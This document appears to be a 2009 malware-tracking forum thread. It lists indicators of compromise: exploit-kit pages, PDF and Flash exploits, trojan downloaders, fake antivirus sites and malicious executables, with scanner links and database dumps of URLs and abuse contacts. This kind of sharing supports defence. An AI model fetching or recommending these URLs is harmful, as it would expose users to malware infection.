svazkusavip.com/counter/dummyButAre.pdf
flash:
svazkusavip.com/counter/alwaysWord.swf
trojan (downloader):
svazkusavip.com/counter/update.php
http://www.virustotal.com/analisis/ddc27e9df2e8cdae43d75c5a1db53b1876a47c219000d5735460496b5298c1a8-1246347509
Exploits (wepawet fails on this one):
nah77.biz/myy/index.php
http://jsunpack.jeek.org/dec/go?url=nah77.biz_myy_index.php
PDF:
nah77.biz/myy/pdf.php
Trojan (Emold):
nah77.biz/myy/load.php
http://www.virustotal.com/analisis/5b2536fccffdcbaf1d6538e01f34cde8ce104b1bced4cc42d1b64d554283698f-1246349005
Exploits (wepawet and jsunpack fail on this):
imagehut5.cn/index.php
PDF:
imagehut5.cn/pdf.php?id=2
Trojan:
imagehut5.cn/load.php?id=2
http://www.virustotal.com/analisis/301a24d763c36477cfc192c27b95c83a4801f75f98f0f7c2a5fe86973e9d4422-1246349595
Trojan downloaded by the above (changes tcpip.sys):
85.114.141.207/EvID4226Patch.exe
http://www.virustotal.com/analisis/0d78fc5700892aee90cd409716b2f6e1a844da5e85e563eaac631a58d8d0edc2-1246349673
-
-
-
Fake AV:
pornotube914.com/scan
atoylev.cn/?wm=70321
-
mvt.c4.fr/a.css
mavr-best.com/ldr/bot.exe
-
pornotube915.com/codec/.exe
74.52.164.210/pk/bb090621.exe
-
megavipsite.cn/av/iframe/socks.exe
l3world.ru/l2.exe
-
freett.com/950065/guama.exe
freett.com/950065/cq.exe
freett.com/950065/arp.exe
freett.com/950065/qn3.exe
freett.com/950065/pt.exe
freett.com/950065/hb1.exe
xoomer.alice.it/email02/bom.jpg
hxxp://www.fanv.cn/d.exe
hxxp://www.fei4.cn/aa.exe
-
hxxp://x.b76.net/winres.exe
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=1&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://bewfsnfwka.net/uniq.php?id=1883789557&p=0
hxxp://bgukeumzwz.net/ccsuper1.php
hxxp://bgukeumzwz.net/ccsuper0.php
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=
hxxp://click0617.winrar2009.cn:88/files/click.jpg
hxxp://bgukeumzwz.net/ccsuper2.php
hxxp://www.51.la/?002941498
hxxp://heyjoy.cn/612.exe
hxxp://img.users.51.la/2941498.asp
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=2&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://www.51.la/?2941498
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=3&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://ppc0617.winrar2009.cn:88/d.txt
hxxp://bgukeumzwz.net/ccsuper3.php
-
hxxp://www.area03601.com/components/k.exe
hxxp://www.area03601.com/components/w.exe
iarc.er-robotics.org/images/wingb.dll
iarc.er-robotics.org/images/gbtext.dll
hxxp://www.toncom.net/images/indexn.gif
ssl1899.websiteseguro.com/box10/errors.exe
ssl1899.websiteseguro.com/box10/3.exe
up.cj-vv.cn:889/up1/up.exe
-
http://securitybestonline.com/hitin.php?land=20&affid=21300
http://netsecurityweb.com/hitin.php?land=20&affid=20100
http://goscanany.com/?uid=13005
http://av-scan-64.com/?id=48040
http://therealsecurityshields.com/page.php?id=73
http://6-tube-world.com/xplaymovie.php?id=40012
http://downloadfixandlove1.com/file.exe
http://downloadfixandlove.com/pcdef.exe
http://video-tube.cn/tds3/in.cgi?5
http://green-tube-site.com/xplaymovie.php?id=45095
http://exedoc.com/TubeViewer.ver.6.48022.exe
http://exedoc.com/av-scanner.48040.exe
http://theexe.com/streamviewer.45059.exe
-
"PC Security 2009"
braviax/brastk advertised rogue
http://pcsecurity2009.com/
Kuxx.info
http://pcsecassal.com/1/installer/Installer2.exe
http://pcsecureredirect2.com/?wmid=1025&d=1&it=2&s=1
pcsecurity-2009.com
-
Rogue related sites:
http://Anti-virus-best.com
http://anti-virus-best.info/install.php
http://download.anti-virus-best.info/dl/PreInstaller.exe
http://Sprut-cluster.info
http://genantivirus.com/download/GeneralAntivirus.exe
http://check-for-threats.us/5/11/0/wsetup.exe
http://securitytrial.com/hitin.php?land=30&affid=21700
http://securitytrial.com/download.php?affid=21700
-
Fake porn and associated trojan distributing sites
http://yourtubetop.com/xplaymovie.php?id=45095
http://exe-paste.com/onlinemovies.45095.exe
http://testtubefilms.com/xfreeporn.php?id=48022
http://exe-porto.com/onlinemovies.1.48022.exe
-
Long time no post....
Fake AV:
axevoq.cn
scanmeta6.info
Fake AV downloader:
x-daily.com/st/img/z/
http://www.virustotal.com/analisis/ec8f810f10303fd92dbd71cad82e4f88b4eeb1a106e0c7f19deb6783d85cff8a-1247469472
Trojans:
krisnet.cn/test/mss8.exe
http://www.virustotal.com/analisis/514a5b90e717557b021dc3db33db42306dc98d40244fc5d6ae8bbe35bf85d3f9-1247471742
analitics.in/load.php?id=5
http://www.virustotal.com/analisis/638fe7388525c7921a8a25dcdbb724cd2e30191ca61146640abd7bedd0ee37c5-1247474875
goodtraff.ru/exe.php
http://www.virustotal.com/analisis/8fef564cab88a2e50d46ba0ecf29962dc8ccb1a47f7b0aabb8d4b0202e2a6412-1247301460
onuka.cn/dll/mal.txt
http://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1247482711
Trojan Emold:
puppsik.biz/bin/mainokK.exe
http://www.virustotal.com/analisis/1fe41137eacfc78a731628bfb77cb9e32453905fbf19e8bd89cbdbe713d37b4c-1247475919
PDF exploit:
www.tech2tech.cn/pack/pdf.php
Trojan:
www.tech2tech.cn/pack/load.php
www.virustotal.com/analisis/5e93068f29e3de9cc46273a20daebecb3e0f837b7ad38454032ff040af1502fb-1247175304
PDF Exploit:
updatedate.cn/img/pfqf2.php
updatedate.cn/img/pfqf.php
Trojan:
updatedate.cn/img/uet.php
http://www.virustotal.com/analisis/6779fd91fd3f3a9aa17e1198af5f599d50bc8e17f0c0abd0232dd67ab02cf1f6-1247467328
Exploits:
bezopbizn.ru/up/index.php
http://wepawet.iseclab.org/view.php?hash=e49b5e3e7e53eb102b9b915e12a455cf&t=1247471805&type=js
PDF
bezopbizn.ru/up/pdf.php
Trojan Emold:
bezopbizn.ru/up/getexe.php
http://www.virustotal.com/analisis/357a0ba3ef66843d5cb8ff4e6098aa57f380888d710827b6d99a5d30fe222cbc-1247472448
contains an iframe to exploits:
sulidev.com/ie.php
http://wepawet.iseclab.org/view.php?hash=fa8b3589b1dbf71ff281b646934c86aa&t=1247478460&type=js
Exploits:
usrvnu.ru/shot.php?aff=1
http://wepawet.iseclab.org/view.php?hash=39123a5ebfa961048ee1c9619780defe&t=1247478902&type=js
usrvnu.ru/ds94685.htm
http://wepawet.iseclab.org/view.php?hash=aac8d2b75e2eeabfc06fc7f2e3107584&t=1247478766&type=js
usrvnu.ru/ds94685.jpg
http://wepawet.iseclab.org/view.php?hash=791a64ca4f4d3dc353b02935ec3aaf5c&t=1247478925&type=js
PDF:
usrvnu.ru/pdf.php?id=94685
Exploits:
ferarilatka.cn/exp/index.php
http://wepawet.iseclab.org/view.php?hash=8030471c9b20f1a008be9c8ee9218bca&t=1247479213&type=js
PDF:
ferarilatka.cn/exp/koxyebuth.pdf
Flash:
ferarilatka.cn/exp/xyachuch.swf
Trojan Oficla:
ferarilatka.cn/exp/update.php
http://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247479392
Exploits:
wesssrett.cn/catalog/index.php
PDF:
wesssrett.cn/catalog/theirTextLayout.pdf
Trojan oficla:
wesssrett.cn/catalog/update.php
http://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247152324
Exploits:
thetests.net/yes/index.php
http://wepawet.iseclab.org/view.php?hash=c8e7a115937fdb157ccc26bca75fab21&t=1247481445&type=js
PDF:
www.thetests.net/yes/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|Internet Explorer
Trojan:
www.thetests.net/yes/load.php?s=6
http://www.virustotal.com/analisis/80f0b51b1153675c5a111db83d1a409c3730a67f73273368197a35440fdfc7f6-1247247444
Exploits:
webalfa.cn/pab/index.php
http://wepawet.iseclab.org/view.php?hash=fce245c8bb2cd14ff823671322a196cf&t=1247481888&type=js
PDF:
webalfa.cn/pab/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|128.111.48.95
Trojan:
webalfa.cn/pab/load.php
http://www.virustotal.com/analisis/dbb5472ac5c82fc089c2a48f9514a6273548ec36c41db49e5bb9e31a7b4c4db7-1247482366
-
hxxp://hotexefiles.com/onlinemovies.45080.exe
http://www.virustotal.com/analisis/f1a9d76bfa53a8ebb94c3c9a6ce4dd0c2ce1766f64be2d353c1d2db8b041f45c-1247534725
-
System Security rogue related sites
http://sucupdate.com/download.php?affid=00000
http://zocleaner.com/download.php?affid=00000
Trojan
exenetsfiles.com/onlinemovies.1.48040.exe
http://sexfreetube.net/movies/download/free_stream_video.exe
http://sexfreetube.net/movies/download/codec.exe
-
Hi folks, another bunch of malware in the wild:
see also http://support.clean-mx.de/clean-mx/viruses?response=alive
-- gerhard
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp | scanner | virusname | review | email | country | source | netname | url |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2008-08-18 21:20:02 | trendmicro | TROJ_XCHANGER.B | 77.235.49.27 | phone: +302106560551 | NL | RIPE | GR-EUROVPS-20070517 | http://www.operasofia.com/install.exe |
| 2009-05-19 03:55:04 | avira | TR/Dropper.Gen | 201.12.119.15 | sistemas@intelignet.com.br | BR | LACNIC | 002.421.421/0001-11 | http://201.12.119.15/Cadastramento.exe |
| 2009-05-25 17:55:09 | avira | DR/FakeAV.MX | 221.5.74.38 | abuse@cnc-noc.net | CN | APNIC | CNCGROUP-GD | http://dl.guarddog2009.com/av.exe |
| 2009-06-23 23:55:13 | avira | TR/Spy.Banker.ABPR | 60.208.77.210 | abuse@cnc-noc.net | CN | APNIC | CNCGROUP-SD | http://60.208.77.210/MOD/MODULO-ITAU.exe |
| 2009-06-24 02:55:18 | avira | TR/ATRAPS.Gen | 208.196.247.108 | NETQ@aitcom.net | US | ARIN | UUNET1996B | http://208.196.247.108/awstats/classes/src/Telegrama-7614.scr |
| 2009-06-30 14:01:49 | avira | TR/Dldr.Fake.CGAV | 76.76.103.164 | abuse@existhosting.com | CA | ARIN | INTERWEB-MEDIA | http://guardlab2009.biz//InstallerWF.exe |
| 2009-06-30 14:01:49 | avira | TR/Dldr.Fake.CGAV | 76.76.103.164 | abuse@existhosting.com | CA | ARIN | INTERWEB-MEDIA | http://guardlab2009.net//InstallerWF.exe |
| 2009-06-30 14:01:49 | avira | TR/Crypt.ZPACK.Gen | 65.61.216.163 | abuse@in2net.com | CA | ARIN | IN2NETWORK | http://healthylifehypnotherapy.com/flashcodecinstall_13_31.exe |
| 2009-06-30 14:01:49 | avira | ADSPY/DiscoveryLive.A | 64.22.66.202 | abuse@gnax.net | US | ARIN | GNAXNET | http://mdl.stuffplug.com/MDL_1.3.0300.exe |
| 2009-06-30 14:01:49 | undef | unknown_SetupPoker_46c620.exe | 69.90.74.226 | abuse@peer1.net | US | ARIN | PEER1-BLK-08 | http://banner.titanpoker.com/cgi-bin/SetupPoker.exe |
| 2009-06-30 14:01:49 | avira | TR/Agent.82944 | 67.210.127.56 | hostmaster@lunarpages.com | US | ARIN | ADD2NET-DOT-COM | http://boutique-world.com/watch.exe |
| 2009-06-30 14:01:49 | undef | unknown_$INSTDIR/DivxPlayer.exe | 207.218.211.242 | abuse@ev1servers.net | US | ARIN | EVRY-BLK-1 | http://divx-player.ivefound.com/./download/DivxPlayerSetup.exe |
| 2009-06-30 14:01:49 | undef | unknown_$SHELc[17]/360safe/Shield/Install/360sandbox.exe | 60.170.241.20 | wanglinlin2@anhuitelecom.com | CN | APNIC | CHINANET-AH | http://down.360safe.com/se/360se_1.3.exe |
| 2009-06-30 14:01:49 | undef | unknown_exe | 221.203.179.20 | abuse@online.ln.cn | CN | APNIC | CNCGROUP-LN | http://down.sandai.net/Thunder5.8.7.625.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://palsol.com/downloads/spyrem_setup.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-06-30 14:01:50 | avira | TR/Dldr.Agent.yhp | 217.76.156.92 | abuse@tpnet.pl | PL | RIPE | NET-PIENSASOLUTIONS-2 | http://sapacontenedores.com/get_flash_update.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 70.38.54.20 | abuse@noc.privatedns.com | CA | ARIN | IWEB-BLK-05 | http://spyremover.com/downloads/SpyRemoverSetup.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 62.149.174.149 | hostmaster@technorail.com | IT | RIPE | TECHNORAIL-NET | http://www.artistinove.it/shok_video.exe |
| 2009-06-30 14:01:50 | avira | BDS/Hupigon.Gen | 125.65.112.10 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.js0575.com/ac/2.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 75.125.152.58 | abuse@theplanet.com | US | ARIN | EVRY-BLK-17 | http://www.macrovirus.com/setup.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 61.139.126.14 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.nicovedeo.com/watch/ma.exe |
| 2009-06-30 14:01:50 | avira | DR/KeyLog.32 | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://www.palsol.com/downloads/v3/Setup_CSS_Shareware.exe |
| 2009-06-30 14:01:50 | avira | DR/KeyLog.32.1 | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://www.palsol.com/downloads/v3/Setup_PCS_Shareware.exe |
| 2009-06-30 14:01:50 | avira | ADSPY/Softomat.E.10 | 64.111.196.124 | abuse@isprime.com | US | ARIN | ISPRIME-ARIN-2 | http://www.peakclick.com/toolbar/1/toolbar.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://www.privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-07-01 17:53:46 | undef | unknown_exe | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://kodenadaqequnul2.googlegroups.com/web/a289743kjhfkjhkj3hkj.swf?gda=q-N2NUsAAACuGiGjtYknYpnLJ9JOD6VhQaFUmokO1f_8pAMqUmUp_d812b7JYV_uUBJlRIiigwRbYpQIvmf_l9f_E8k9I2rxBkXa90K8pT5MNmkW1w_4BQ |
| 2009-07-06 19:04:09 | undef | unknown_exe | 82.103.141.146 | abuse@easyspeedy.com | DK | RIPE | EASYSPEEDY-NETWORK | http://www.ymmoo.net/setup_ymmoo.exe |
| 2009-07-06 23:59:18 | avira | TR/Dropper.Gen | 66.71.244.130 | wnoc@wiresix.com | US | ARIN | WIRESIX | http://www.hotlinkfiles.com/files/2655943_ce2wp/fotos_Album.exe]fotos_Album.exe |
| 2009-07-08 15:01:11 | avira | TR/Dropper.Gen | 210.51.181.129 | cncipaddr@china-netcom.com | CN | APNIC | CNC-BJ-IDC | http://youtube-adult.name/id_0122.exe |
| 2009-07-09 19:57:17 | avira | TR/Dropper.Gen | 66.71.244.130 | wnoc@wiresix.com | US | ARIN | WIRESIX | http://www.hotlinkfiles.com/files/2660772_bgpzg/curriculum.scr |
| 2009-07-11 19:58:49 | avira | DR/PSW.Zapchast.zwrc.54 | 62.77.192.160 | abuse@invitel.net | HU | RIPE | VTH | http://62.77.192.160/~webuser/postcard.jpg.exe |
| 2009-07-11 22:58:33 | avira | TR/Crypt.ZPACK.Gen | 61.139.126.91 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.skywebsv.com/play/cer.exe |
| 2009-07-14 09:57:02 | avira | TR/Buzus.bntm | 212.117.166.78 | abuse@root.lu | LU | RIPE | SERVER-LU | http://212.117.166.78/ausverkauf.exe |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
34 rows in set (0.45 sec)
-
hi
these sometimes have JavaScript or something else ... but Avira, ClamAV and TrendMicro are currently not reporting any malware/fraud on these URLs
I think they should be examined more deeply... I post these here FYI
-- gerhard
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp | virusname | review | email | country | source | netname | url |
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2009-05-18 15:55:08 | unknown_html | 74.125.39.191 | arin-contact@google.com | US | ARIN | GOOGLE | http://globalhackerstools.blogspot.com/2008/09/all-in-one-ultra-hacker-2008-new-tools_27.html |
| 2009-06-30 14:01:50 | unknown_html | 88.208.17.116 | phone: +38 063 188 2888 | NL | RIPE | HALDEX-NET | http://www2.porntube-vip.com/watch//downloads/FlashPlayerH264Ext.exe |
| 2009-06-30 14:01:50 | unknown_html | 218.85.132.243 | fjnic@fjdcb.fz.fj.cn | CN | APNIC | CHINANET-FJ | http://www.yljsx.gov.cn/images/calc.exe |
| 2009-07-01 17:53:46 | unknown_html | 80.74.145.118 | abuse@metanet.ch | CH | RIPE | METANET | http://entre-lacs.ch/1.html |
| 2009-07-01 17:53:46 | unknown_html | 80.109.240.75 | hostmaster@chello.at | AT | RIPE | AT-TELEKABEL-20010719 | http://members.chello.hu/gyenes.attila5/1.html |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://podarki-rnd.by.ru/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:46 | unknown_html | 209.59.166.237 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-2 | http://www.pcngpu.com.br/1.html |
| 2009-07-01 17:53:46 | unknown_html | 80.74.156.168 | abuse@metanet.ch | CH | RIPE | METANET | http://grandpin.ch/1.html |
| 2009-07-01 17:53:46 | unknown_html | 72.167.232.65 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://nogglemedia.com/1.html |
| 2009-07-01 17:53:46 | unknown_html | 66.96.145.104 | kwitt@bizland-inc.com | US | ARIN | BIZLAND-FC01 | http://ebook-friend.com/pwqswldfkre.html?UCyHhvJCU |
| 2009-07-01 17:53:46 | unknown_html | 61.19.250.192 | suchok@cat.net.th | TH | APNIC | CAT | http://saratta.com/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:46 | unknown_html | 72.9.249.146 | abuse@gnax.net | US | ARIN | GNAXNET | http://fairwheelbikes.com/njfdhfiejowas.html?CgbNLg |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://cookzidigo1984.googlegroups.com/web/Index5.html?gda=cA4xsj4AAAAUrONGIfshKYzP_pPasy2HS9sH-CYRB06_bMAh3oeDS07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 72.167.232.230 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://tudatosbiztonsag.com/frew9riuewods.html?CQOuNtk |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://parkernifeja1980.googlegroups.com/web/Index5.html?gda=XIDTdj4AAABVan8diZdyODBkZ07ksmLZSduHNVPn0lwlkdSFb2uh_k7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://millerlojifi1981.googlegroups.com/web/Index5.html?gda=UKjnkD4AAAAUZbPPzR8lan7ls97bTuePaMD_fMZblYsPxSXEdzJi0E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 90.156.153.106 | abuse@masterhost.ru | RU | RIPE | MASTERHOST | http://vippodarki.su/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://robinsonnyqely1978.googlegroups.com/web/Index5.html?gda=v83xTT4AAABaW0SLoLlP-nQ40g4dkyaUAK5RJIrd9MaFPSL3ekVz8k7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/UF6VBDVCTTTIAIH5UJTFTDZXJM?eid=AykUIDBmkHQN2blLw7WjbLTls27AdNGhQuoxSVmZFkr9VSHHYw |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/2XMNQRSXYVGNUUO2RWJGDRPAKM?eid=LKveJ5xgzS_IOJnysoFvbz2O6.KN84UJkq8Y7EAwQoVpm7RVzw |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/IWJV4HSIWJO65P2ARC3QJEZU4E?eid=xwnLgaM2y3zG.Wrls4skh4ujc7NZ.b8bIkrpe1eviKv_VaZwVQ |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/TTIOM3EBKPOJQOH4IEOP6F6KHI?eid=6CCDB7lnn37pLAU3CbeBAHhSEMZlTo5NISCBScNcduZP8ktisQ |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/UD75QFVUPKIZJEKD36B5YJRFII?eid=AS0CmkQxmXQP_9LXWUx_rqrQbbdYq4JEOvQtBklg2YiNHml2ow |
| 2009-07-01 17:53:46 | unknown_html | 201.33.17.121 | contato@datacorpore.com.br | BR | LACNIC | 008.210.265/0001-26 | http://projetomaosdadas.org/moewkplsa.html?kBmLfuiPc |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?EqNuQanVj |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?ohhUnZs |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?QwVpihZg |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://studyfoundry.by.ru/gfekowkfeosd.html?7H1BB |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://hughesconufo1986.googlegroups.com/web/Index5.html?gda=0I6akz4AAABzJoncJQYrPGjbeasFFmdbRyjR8pcLw5RY6hAKFCZRj07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://howarddukyji1977.googlegroups.com/web/Index5.html?gda=y6MJej4AAABv1pS0tx1d9OqjhdsrWIIu-LNb24h9VsKL8WbSeUKLSU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://clarkqodubo1987.googlegroups.com/web/Index5.html?gda=3_3R_j4AAACs6KG2Ckc1FIch73EAo2Sah9vxzBS9DAyUfuOQJ518P07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://powelljeruda1985.googlegroups.com/web/Index5.html?gda=iwDitz4AAADiXhM7N9HjtaAgymI4Vc40l-L-jzasWj--FgC_pFWbFE7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://leeteqoku1984.googlegroups.com/web/Index5.html?gda=ACpmBz4AAACoXxfdVTUpZahJ3X89TepfoKRVV5C9d54Y9y3J06kds07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://evanslucoce1985.googlegroups.com/web/Index5.html?gda=uNuUkz4AAABx_3PjzrnXA5jh0yfbkGiCL60X8D5oOnNH6BMQbCWcrk7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://fosterhyzody1987.googlegroups.com/web/Index5.html?gda=_pMy0T4AAAB7IfldT9E8kXR6OvEeUYfWhapeTkXFL2vDREaGX4eyP07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://cooperwypunu1987.googlegroups.com/web/Index5.html?gda=1FB-WT4AAACj7WHp7os86Au9u4NuiJDlySdCQLMlV9HlwEZxtD9DAk7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/5X7H5Q2X5ZZMFBZHVE4C74ENJE?eid=n4MAr6Vkn3o_1GnTbDocHBqcwXcF8H7DaMytJ1yG9TeHxVXnCg |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://longdovape1977.googlegroups.com/web/Index5.html?gda=jsx7mj4AAAAVd6afZvykctiFsUahpWoKans2ZG_0R1guYsdEP5iVVU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://morrismipanu1978.googlegroups.com/web/Index5.html?gda=N58hSz4AAACIb0LGJp38fhqPSrP2G1ZuMdJG8dMFNK7g-KV0OKPR807SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://bellrufovi1984.googlegroups.com/web/Index5.html?gda=xxx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://bakersypypy1984.googlegroups.com/web/Index5.html?gda=47DJoz4AAACbhW_MZTUrT9-QsVWWJ1ZyvrWH07qmMmlNlOt8tukq5E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 94.198.98.17 | phone: +39 3297488302 | IT | RIPE | SUPERNOVA-NET | http://www.postapop3.netsons.org/po3.html |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://garciacufiti1983.googlegroups.com/web/Index5.html?gda=OeeYdz4AAABIeTRSouOs75JjnDXHCwADKTrIBnTVU-2vLl4ZTUOY5E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://collinsdahyso1984.googlegroups.com/web/Index5.html?gda=UdfB7T4AAABUsvVsyDye1ForhJuVZb0cEHYyCzh6VTQc_UQ0Ah6Qc07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/JJ2GSDOYO76CMLG6ABAZFFUJ74?eid=rB0o1ahnynVJOwQvjf4x3edUCf3B.jj3gBf2_1ilBcG_QSA.LA |
